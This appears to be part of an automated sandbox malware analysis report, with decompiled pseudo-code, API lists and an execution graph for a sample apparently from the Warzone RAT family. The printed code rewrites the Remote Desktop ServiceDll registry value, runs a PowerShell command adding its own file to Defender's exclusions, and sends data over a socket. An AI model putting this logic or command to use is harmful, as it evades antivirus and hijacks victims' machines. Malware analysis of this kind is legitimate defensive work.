                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 7fb5f461d844d43ae5ee09177f5fdd9205cc51f645f5d71c68dd4a3ca71e6cd2
                                      • Instruction ID: 8fab33af74db4c7a40a280295eedd0eb085f65f8bcc2af09ff54b670ec394131
                                      • Opcode Fuzzy Hash: 7fb5f461d844d43ae5ee09177f5fdd9205cc51f645f5d71c68dd4a3ca71e6cd2
                                      • Instruction Fuzzy Hash: 5BE0B679821161AEC6666F14B9C885B3BAEBB78714F410746E70022318EB3626569F81
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0026161E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143UNIQUE
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,?,?,?,?), ref: 00261810
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event
                                      • String ID: (m&$Dm&
                                      • API String ID: 4201588131-3242779591
                                      • Opcode ID: 852daa7824739dc00518ecd9ff645e4ebc6f0585101ae5829f7014e085589fdc
                                      • Instruction ID: db429648154e98cc8dec1dba80960ea3707f58b5419ce8ed4b55899c4d2f5562
                                      • Opcode Fuzzy Hash: 852daa7824739dc00518ecd9ff645e4ebc6f0585101ae5829f7014e085589fdc
                                      • Instruction Fuzzy Hash: 5C514A35A20107EBCB14DF54E88D96ABBBAFB84300F28C519D85293664CBB1F9F4CB50
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025C1A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025C1A0(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E00253412( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E0025EF61( &_v8, _t46, E00253412( &_v12, L"ServiceDll"),  &_v24);
					E00255A2D(_v12);
					if(_t28 != 0) {
						_t48 = E00253075(E00252D08( &_v24, __eflags,  &_v12), 0x267d0c);
						E00255A2D(_v12);
						_v12 = 0;
					} else {
						E0025EF4C( &_v8);
						goto L3;
					}
				}
				E00252E66( &_v24);
				E00255A2D(_v16);
				E0025EF4C( &_v8);
				return _t48;
			}











                                      0x0025c1a0
                                      0x0025c1b2
                                      0x0025c1b5
                                      0x0025c1bd
                                      0x0025c1ca
                                      0x0025c1da
                                      0x0025c20c
                                      0x0025c20c
                                      0x0025c1dc
                                      0x0025c1f1
                                      0x0025c1fb
                                      0x0025c202
                                      0x0025c247
                                      0x0025c249
                                      0x0025c24e
                                      0x0025c204
                                      0x0025c207
                                      0x00000000
                                      0x0025c207
                                      0x0025c202
                                      0x0025c211
                                      0x0025c219
                                      0x0025c221
                                      0x0025c22b

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00267CD8,?,?,0025C6D5,?,?), ref: 0025C1D2
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      • ServiceDll, xrefs: 0025C1E0
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025C1AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 1903904756-387424650
                                      • Opcode ID: 82e1a1005492ffcabcd5328d26f48ddee989ee4d159938ea41e36cf84f1dde03
                                      • Instruction ID: 844ba22137dba88c658879f216675a20af09ad79c91bd90fc190e50f4f6576e1
                                      • Opcode Fuzzy Hash: 82e1a1005492ffcabcd5328d26f48ddee989ee4d159938ea41e36cf84f1dde03
                                      • Instruction Fuzzy Hash: 0E114271D20218BBCF14EBE0D9568EEB778AF50752F100155AC02B7192EF709F28DB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 0025BD37, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025BD37(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E00253412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E0025304E(_t45 + 0x34, _t43,  &_v36);
					_t28 = E0025EFCB( &_v12, E00253412( &_v16, L"ServiceDll"), _t26, 2);
					E00255A2D(_v16);
					_v16 = 0;
					E00252E66( &_v36);
					E0025EF4C( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00252E66( &_v28);
				E00255A2D(_v20);
				E0025EF4C( &_v12);
				return _t44;
			}














                                      0x0025bd37
                                      0x0025bd3f
                                      0x0025bd41
                                      0x0025bd4b
                                      0x0025bd4e
                                      0x0025bd56
                                      0x0025bd63
                                      0x0025bd73
                                      0x0025bd7e
                                      0x0025bd95
                                      0x0025bd9f
                                      0x0025bda7
                                      0x0025bdaa
                                      0x0025bdb2
                                      0x0025bdb9
                                      0x0025bdbb
                                      0x0025bdbb
                                      0x0025bdb9
                                      0x0025bdbf
                                      0x0025bdc7
                                      0x0025bdcf
                                      0x0025bdd9

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0025BD6B
                                        • Part of subcall function 0025EFCB: RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,0025F239,?,00000000,?,00000001,?,?,?), ref: 0025EFEA
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      • ServiceDll, xrefs: 0025BD84
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0025BD43
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 2854241163-387424650
                                      • Opcode ID: 9b5e96a3e29c1c9c4a3deca6153f4a5281309b3a5d191cd1b88f4dfe3f8d904e
                                      • Instruction ID: 000c146efb20e5a0df3086663adde5f737d4f7fc5fa86e490e52d5197311367a
                                      • Opcode Fuzzy Hash: 9b5e96a3e29c1c9c4a3deca6153f4a5281309b3a5d191cd1b88f4dfe3f8d904e
                                      • Instruction Fuzzy Hash: 0D1173B1D10219ABCB14EB91CC96DEEBB78FF90701F004069EC02B2192EF706B59CE54
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00260D9D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00260D9D(void* __ecx, void* __eflags) {
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E002510AD(0x100);
				_t21 = E002510AD(0x100);
				E00251052(_t22, 0, 0x100);
				E00251052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100);
				E0025102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E002510D5("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E0025102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E0025102C(E002510D5(_t21) + _t21, _t2, 1);
				return WinExec(_t21, 0);
			}





                                      0x00260dac
                                      0x00260db7
                                      0x00260db9
                                      0x00260dc2
                                      0x00260dce
                                      0x00260de2
                                      0x00260de9
                                      0x00260dee
                                      0x00260df6
                                      0x00260e09
                                      0x00260e1d

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,00000000,0026131C), ref: 00260DCE
                                      • WinExec.KERNEL32(00000000,00000000), ref: 00260E14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocExecFileModuleNameProcess
                                      • String ID: powershell Add-MpPreference -ExclusionPath
                                      • API String ID: 1018710590-2194938034
                                      • Opcode ID: 1dc8f3a16d1a61b4c5e7ca00983f8e072c91755b54c2d457486c660ceb56d56f
                                      • Instruction ID: 253fff07a9c40cc97774926f39d6ce001cfcf42e13623ea76475d0017d434354
                                      • Opcode Fuzzy Hash: 1dc8f3a16d1a61b4c5e7ca00983f8e072c91755b54c2d457486c660ceb56d56f
                                      • Instruction Fuzzy Hash: DBF096F19602507AE53032719CCFFBB265CDF89762F140425FE04A21C3DAB89CB94A79
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 0025515A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0025515A(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					E00252E33( &_v24, __edx, E002531EC( &_v12, "warzone160"));
					_t31 = _v12;
					E00255A2D(_v12);
					_t39 = _a4;
					_t32 = _t40;
					E00252E79(_t40, _t39);
					E00252E79(_t40,  &_v24);
					_t7 =  &_v16; // 0x254b71
					_t21 = E00255C32(_t7, _t37, _t40, _t32, _v12, _t31);
					_t9 =  &_v16; // 0x254b71
					_t10 = _t38 + 0xc; // 0x2619af
					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
					E00252E66( &_v16);
					E00252E66( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}










                                      0x0025515a
                                      0x00255163
                                      0x00255169
                                      0x00255180
                                      0x00255185
                                      0x00255188
                                      0x0025518d
                                      0x00255192
                                      0x00255195
                                      0x002551a2
                                      0x002551a7
                                      0x002551aa
                                      0x002551b7
                                      0x002551ba
                                      0x002551bd
                                      0x002551ce
                                      0x002551d6
                                      0x00000000
                                      0x002551db
                                      0x00000000

                                      APIs
                                      • send.WS2_32(002619AF,qK%,?,00000000), ref: 002551BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID: qK%$warzone160
                                      • API String ID: 2809346765-3936098851
                                      • Opcode ID: e8c69a3ad72b9a4d9d5441b5d8ecff3427d8e93051a6c9f0eb8284785881ade6
                                      • Instruction ID: 8a783f6b18e27f30dfdb84e2d0ce099e44050d4fada1a0a1c0f076ed7df94b47
                                      • Opcode Fuzzy Hash: e8c69a3ad72b9a4d9d5441b5d8ecff3427d8e93051a6c9f0eb8284785881ade6
                                      • Instruction Fuzzy Hash: F7019B71530415BBC704E7A4DC53DDEB768DF11362B104229F912620D1EB70BE2D8AA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00260164, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30synchronizationUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00260164(void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _t10;
				void* _t11;

				E0025E20D(0x266d74);
				if( *0x266d70 == 0) {
					_t10 =  *0x266d6c; // 0x3c0a58
					if(_t10 == 0) {
						_t11 = 0x38;
						if(E00255ADB(_t11) == 0) {
							_t10 = 0;
						} else {
							_t10 = E00260C9A(_t7, _t11);
						}
						 *0x266d6c = _t10;
					}
					 *0x266d68 = _a4;
					 *0x266d70 = 1;
					E00260AD0(_t10, _a8);
				}
				return ReleaseMutex( *0x266d74);
			}





                                      0x0026016c
                                      0x00260178
                                      0x0026017a
                                      0x00260182
                                      0x00260186
                                      0x0026018e
                                      0x0026019c
                                      0x00260190
                                      0x00260198
                                      0x00260198
                                      0x0026019e
                                      0x0026019e
                                      0x002601aa
                                      0x002601af
                                      0x002601b9
                                      0x002601b9
                                      0x002601cb

                                      APIs
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • ReleaseMutex.KERNEL32(?,00254970,?,?), ref: 002601C4
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocMutexObjectProcessReleaseSingleWait
                                      • String ID: X<$tm&
                                      • API String ID: 3462506114-921331389
                                      • Opcode ID: 42452f3f3bdf88405bc805344189bbf8616358edea32211509ce2a8ccec81056
                                      • Instruction ID: 208acc0a9facaebfd0e5aa5f7e5159db278d5a939d86706939584a718c118e0b
                                      • Opcode Fuzzy Hash: 42452f3f3bdf88405bc805344189bbf8616358edea32211509ce2a8ccec81056
                                      • Instruction Fuzzy Hash: 37F0BE707202049BCF18AF64FC5D72A3BA5AB45340F10816AF80AC22A1DFB188A0EE95
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0026012D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13synchronizationUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0026012D(void* __eflags) {
				intOrPtr _t5;

				E0025E20D(0x266d74);
				if( *0x266d70 != 0) {
					_t5 =  *0x266d6c; // 0x3c0a58
					if(_t5 != 0) {
						E00260A57(_t5, _t5);
						 *0x266d70 =  *0x266d70 & 0x00000000;
					}
				}
				return ReleaseMutex( *0x266d74);
			}




                                      0x00260132
                                      0x0026013e
                                      0x00260140
                                      0x00260148
                                      0x0026014b
                                      0x00260150
                                      0x00260150
                                      0x00260148
                                      0x00260163

                                      APIs
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • ReleaseMutex.KERNEL32(00254962), ref: 0026015D
                                        • Part of subcall function 00260A57: OleUninitialize.OLE32 ref: 00260AC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleUninitializeWait
                                      • String ID: X<$tm&
                                      • API String ID: 2317507087-921331389
                                      • Opcode ID: 9643c3d5976491f6d555562ceeaf406877aa0623ca72e1408554baa093ac0290
                                      • Instruction ID: d99bdb7859f710e243e6802061ca7aebe1007a252dd047a3e1b73dc9b4c7b26d
                                      • Opcode Fuzzy Hash: 9643c3d5976491f6d555562ceeaf406877aa0623ca72e1408554baa093ac0290
                                      • Instruction Fuzzy Hash: 1BD05EB4320501CBCF2A5B20FC4D7293B31BB01306F00C259D105501B0CBB108A4DA02
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025FBFC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13windowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025FBFC() {
				struct HWND__* _t1;
				void* _t4;
				struct HWND__* _t5;

				_t1 = E0025FA9F(_t4);
				_t5 = _t1;
				if(_t5 == 0) {
					MessageBoxA(_t1, "Settings not found !", "DEBUG", _t1);
				}
				return _t5;
			}






                                      0x0025fbfd
                                      0x0025fc02
                                      0x0025fc06
                                      0x0025fc14
                                      0x0025fc14
                                      0x0025fc1d

                                      APIs
                                      • MessageBoxA.USER32(00000000,Settings not found !,DEBUG,00000000), ref: 0025FC14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message
                                      • String ID: DEBUG$Settings not found !
                                      • API String ID: 2030045667-2996925740
                                      • Opcode ID: 7af2cbdaa0790626d3d29c549ed81c1b1fd24f9708cf8622444f9b01b9d113f1
                                      • Instruction ID: 9a1fc0999f391e5148b6bb00bb2470bd488f1e92446470f31710d589cd4c67b4
                                      • Opcode Fuzzy Hash: 7af2cbdaa0790626d3d29c549ed81c1b1fd24f9708cf8622444f9b01b9d113f1
                                      • Instruction Fuzzy Hash: 5BC08C22AA0A336B06A33A643E09C6A450C4A22B533010030FC80E7242C664CCA801D8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Analysis Process: images.exe PID: 3596 Parent PID: 3380 images.exeUNIQUE

                                      Execution Graph

                                      Execution Coverage:5%
                                      Dynamic/Decrypted Code Coverage:61.6%
                                      Signature Coverage:3%
                                      Total number of Nodes:987
                                      Total number of Limit Nodes:36

                                      Graph

                                      execution_graph 27280 410000 27282 410005 27280->27282 27285 41002d 27282->27285 27308 410467 GetPEB 27285->27308 27288 410467 GetPEB 27289 410053 27288->27289 27290 410467 GetPEB 27289->27290 27291 410061 27290->27291 27292 410467 GetPEB 27291->27292 27293 41006d 27292->27293 27294 410467 GetPEB 27293->27294 27295 41007b 27294->27295 27296 410467 GetPEB 27295->27296 27299 410089 27296->27299 27297 4100e6 GetNativeSystemInfo 27298 410109 VirtualAlloc 27297->27298 27306 410029 27297->27306 27303 410135 27298->27303 27299->27297 27299->27306 27300 4101c3 LoadLibraryA 27300->27303 27301 4103c3 27310 440e1e 27301->27310 27302 410207 GetProcAddress 27302->27303 27303->27300 27303->27302 27304 41023c 27303->27304 27304->27301 27305 410384 VirtualProtect 27304->27305 27305->27304 27305->27306 27309 410045 27308->27309 27309->27288 27311 440e27 CreateThread 27310->27311 27312 440e39 27310->27312 27311->27312 27313 43586a GetCommandLineA 27311->27313 27312->27306 27314 43587f GetStartupInfoA 27313->27314 27322 4358f8 27314->27322 27317 4358cb 27318 4358da GetModuleHandleA 27317->27318 27325 4411d0 27318->27325 27378 435816 GetProcessHeap HeapAlloc 27322->27378 27324 435907 27324->27317 27326 4411f4 27325->27326 27327 4411fd GetTickCount 27326->27327 27379 431085 27327->27379 27329 441209 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 27380 4355a0 Sleep 27329->27380 27335 441296 27336 4412a9 SHGetFolderPathW lstrcatW CreateDirectoryW 27335->27336 27337 441307 27336->27337 27338 4412e7 27336->27338 27340 44131c 27337->27340 27341 43db97 4 API calls 27337->27341 27509 43db97 GetCurrentProcess OpenProcessToken 27338->27509 27343 441325 27340->27343 27344 441377 27340->27344 27345 441312 27341->27345 27528 43f0c8 44 API calls 27343->27528 27346 441382 27344->27346 27347 44137d 27344->27347 27345->27340 27350 441317 27345->27350 27514 434a83 27346->27514 27539 43fcd9 22 API calls 27347->27539 27348 4412f1 27524 43d4b8 LoadLibraryA GetProcAddress 27348->27524 27527 440d9d GetProcessHeap HeapAlloc GetModuleFileNameA WinExec 27350->27527 27354 441336 27354->27344 27358 44133c 27354->27358 27356 44138e 27540 434820 6 API calls 27356->27540 27357 4412f6 27360 441302 27357->27360 27361 4412fb 27357->27361 27529 43345a 27358->27529 27526 43f843 22 API calls 27360->27526 27525 43f8c0 27 API calls 27361->27525 27368 441300 27368->27337 27371 441365 27537 435a2d VirtualFree 27371->27537 27375 44136e 27538 435a2d VirtualFree 27375->27538 27377 441375 27377->27356 27378->27324 27379->27329 27541 43e3ed 27380->27541 27392 4355f7 27580 432e79 27392->27580 27394 435603 27583 432ccc 27394->27583 27396 43560f 27587 432e66 27396->27587 27406 435645 27407 43fc1e 9 API calls 27406->27407 27408 435664 27407->27408 27409 433264 3 API calls 27408->27409 27410 435671 27409->27410 27620 435a2d VirtualFree 27410->27620 27412 435679 27413 43fc1e 9 API calls 27412->27413 27414 435698 27413->27414 27415 433264 3 API calls 27414->27415 27416 4356a5 27415->27416 27621 435a2d VirtualFree 27416->27621 27418 4356ad 27419 43fc1e 9 API calls 27418->27419 27420 4356cc 27419->27420 27421 433264 3 API calls 27420->27421 27422 4356d9 27421->27422 27622 435a2d VirtualFree 27422->27622 27424 4356e1 27425 43fc1e 9 API calls 27424->27425 27426 43571f 27425->27426 27427 433264 3 API calls 27426->27427 27428 43572c 27427->27428 27623 435a2d VirtualFree 27428->27623 27430 43573c 27431 432e66 2 API calls 27430->27431 27432 435744 27431->27432 27433 432e66 2 API calls 27432->27433 27434 43574c 27433->27434 27435 435759 27434->27435 27631 431db4 GetProcessHeap HeapFree 27434->27631 27437 432e66 2 API calls 27435->27437 27438 43576c 27437->27438 27624 43de8b 27438->27624 27441 43f2ad 27728 4322ee 27441->27728 27444 43db97 4 API calls 27445 43f2c9 27444->27445 27446 433412 4 API calls 27445->27446 27447 43f2f5 27446->27447 27448 433264 3 API calls 27447->27448 27449 43f2fd 27448->27449 27743 435a2d VirtualFree 27449->27743 27451 43f305 27452 43345a 3 API calls 27451->27452 27453 43f311 27452->27453 27744 433162 27453->27744 27455 43f31c 27751 435a2d VirtualFree 27455->27751 27457 43f324 27458 433412 4 API calls 27457->27458 27459 43f331 27458->27459 27460 433264 3 API calls 27459->27460 27461 43f33a 27460->27461 27752 435a2d VirtualFree 27461->27752 27463 43f342 27464 433412 4 API calls 27463->27464 27465 43f34f 27464->27465 27466 433264 3 API calls 27465->27466 27467 43f358 27466->27467 27753 435a2d VirtualFree 27467->27753 27469 43f360 27470 433412 4 API calls 27469->27470 27471 43f36d 27470->27471 27472 433264 3 API calls 27471->27472 27473 43f376 27472->27473 27754 435a2d VirtualFree 27473->27754 27475 43f37e 27755 43effe 27475->27755 27478 43f438 27502 434b0f 27478->27502 27480 43f430 27481 432e66 2 API calls 